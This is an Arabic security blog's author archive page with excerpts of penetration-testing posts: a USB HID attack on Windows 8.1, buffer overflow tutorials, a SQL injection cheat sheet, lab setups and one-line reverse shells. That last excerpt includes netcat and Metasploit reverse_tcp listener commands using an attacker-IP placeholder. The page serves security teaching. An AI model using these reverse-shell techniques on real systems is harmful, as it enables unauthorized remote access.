RSSجميع مواضيع الكاتب صبري صالح

المهندس صبري صالح. مهندس حماية شبكات و أنظمة و فحصها معالجة و تحليل الأحداث الأمنية و المسؤول عن تطبيق معايير الـ ISO 27001 , يعمل في بيئات متعددة المنصات. حاصل على عدة شهادات تقنية.

post thumbnail

انطلاق مشروع كتاب Rubyfu للغة Ruby لمختبري الاختراق

نبذة عن الكتاب اليوم نعلن رسميا عن انطلاق مشروع الكتاب المفتوح Rubyfu والمختص بالمهارات البرمجية في لغة الـ Ruby لمختبري الاختراق. فكرة الكتاب تختلف عن الكتب الأخرى من حيث عرض المحتوى والفئة المستهدفة وطريقة تطوير الكتاب. هذا الكتاب يستهدف المختصين في الختبار الاختراق (Hackers) بشكل عام والمُلمين بلغة Ruby حيث يضع بين يديك كل ما […]

post thumbnail

اختراق نظام Windows 8.1 بهجوم USB HID

مقدمة من فترة طويلة و أنا أريد استخدام نظام Kali – NetHunter المعدل للعمل مع نظام أندرويد على عدة اجهزة (Nexus 4, 5, 7, 10, OnePlusOne) وسيتم دعم المزيد مستقبلا. توزيعة NetHunter تحمل في قلبها توزيعة Kali وتستطيع أن تعمل كل ما تعمله Kali. في نفس الوقت, هناك إضافات و تسهيلات جعلت الاختراق أسهل بكثير وهناك […]

post thumbnail

إعداد Metasploit مع قاعدة البيانات Postgress على Kali

أصبحت الأمور أكثر استقرارا و أكثر سهولة في Kali. في هذا الموضوع السريع سنضع طريقة ربط مشروع Metasploit بقاعدة بيانات PostGres لتسريع عملية تشغيل الميتاسبلويت وعملية البحث فيها. 1. تشغيل الخدمات service postgresql start service metasploit start – لتشغيل الخدمات تلقائيا بعد إعادة تشغيل النظام update-rc.d postgresql enable update-rc.d metasploit enable   2. تشغيل مشروع […]

post thumbnail

انشاء اتصال عكسي من سطر واحد وبعدة لغات

[toc]   هذه معاني المتغيرات التي ستجدها في الشرح. استبدلها عند التطبيق. $ATTCKER_IP: هو عنواد المهاجم $ATTACKER_PORT: هو المنفذ الذي ينصت عليه الضحية $VICTIM_IP: هو عنواد المهاجم $VICTIM_PORT: هو المنفذ الذي ينصت عليه الضحية Listining تستطيع الإنصات بأي طريقة تحبها – NetCat nc -lvp $ATTACKER_PORT أو ncat -lvp $ATTACKER_PORT – Metasploit ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=$ATTCKER_IP […]

post thumbnail

Buffer Overflow tutorial – Part 2: Stack Based Overflow

[toc]     1. مقدمة في هذه السلسلة, لن أتكلم عن أساسيات ثغرات الـ Buffer overflow فهناك شروحات وفت هذا الجزء. و سأتطرق لما أجده مهم في عملية التطبيق من معلومات و قد أخصص أجزاء نظرية إذا دعت الحاجة. قبل أن نبدأ أرجوا أن توفر المتطلبات التالية في بيئتك لنبدأ العمل بشكل سريع وسهل. نظام […]

post thumbnail

Buffer Overflow tutorial – Part 1: Tools

[toc]     مقدمة سأسرد لكم بعض أهم الأدوات المستخدمة في عملية اكتشاف وكتابة استغلال ثغرات الـ Buffer Overflow. بالطبع هذه الأدوات ليست الوحيدة ولكنها الأشمل والأشهر. إذا رأيت أن هناك أداة مهمة تستحق أن تضاف إلى هذه القائمة الرجاء ذكرها في التعليقات.   تثبيت Ruby 1.9.3 على أوبونتو تثبيت Ruby 1.9.3 على أوبونتو apt-get […]

post thumbnail

الأداة Buffer Overflow Kit

مقدمة عندما بدأت أتعلم Buffer Overflow  اضطررت لاستخدام أدوات مختلفة من أماكن مختلفة, منها ماهو موجوده في الـ Metasploit ومنها ماهو من خارجها ومنها ماتمنيت أن تكون موجودة. فكرت مؤخرا أن أقوم بعمل أداة تجمع معظم الأدوات التي كنت أستخدمها في مكان واحد وإعادة كتابتها من البداية كي أستفيد وأتعلم كيفية بناء مثل تلك الأدوات […]

post thumbnail

SQL injection Cheat Sheet – Php/MySQL

[toc]    1. مقدمة لا يخفى على أحد أهمية ثغرات حقن قواعد البيانات ومدى خطورتها على المواقع والتطبيقات و بالطبع على المعلومات. في هذا الموضوع لن اقوم بشرح مفاهيم ثغرات حقن القواعد وأنواعها بل سيكون بمثابة مراجعة سريعة على الخطوات العملية دون التعرض لأي مبادئ أو مفاهيم مما يؤكد أن هذا الموضوع لا يغنيك أبدا […]

post thumbnail

تثبيت WebGoat على CentOS خطوة بخطوة

مقدمة الكثير منا يحتاج بيئة وهمية لتطبيق ما يتعلمه في استغلال ثغرات تطبيقات الويب. كتابة أكواد مصابة والتطبيق عليها هو إهدار للمجهود والوقت كما أنه من الخطأ التعلم على مواقع حقيقية تخص أشخاص آخرين ولهذا نبحث عن تطبيقات مصابة تم عملها خصيصا للتعلم وتختلف هذه التطبيقات في لغة برمجتها وقواعد بياناتها وأيضا الثغرات الموجودة عليها […]

post thumbnail

مشروع Hackme للتدريب على ثغرات تطبيقات الويب

  عن المشروع مشروع Hackme  أو اخترقني, هو مشروع مجاني يسمح لك بالتدريب على فحص واستغلال ثغرات الويب كمان يمكنك من رفع تطبيقات ويب مصابة بثغرات لكي يقوم الأخرين باختراقها و التدرب عليها. تعمل التطبيقات على سحابة معزولة ومأمنة كما أنها موجهة لجميع الطبقات من الهواة إلى الباحثين وغيرهم. تدعم بيئة المشروع تطبيقات الويب المبنية […]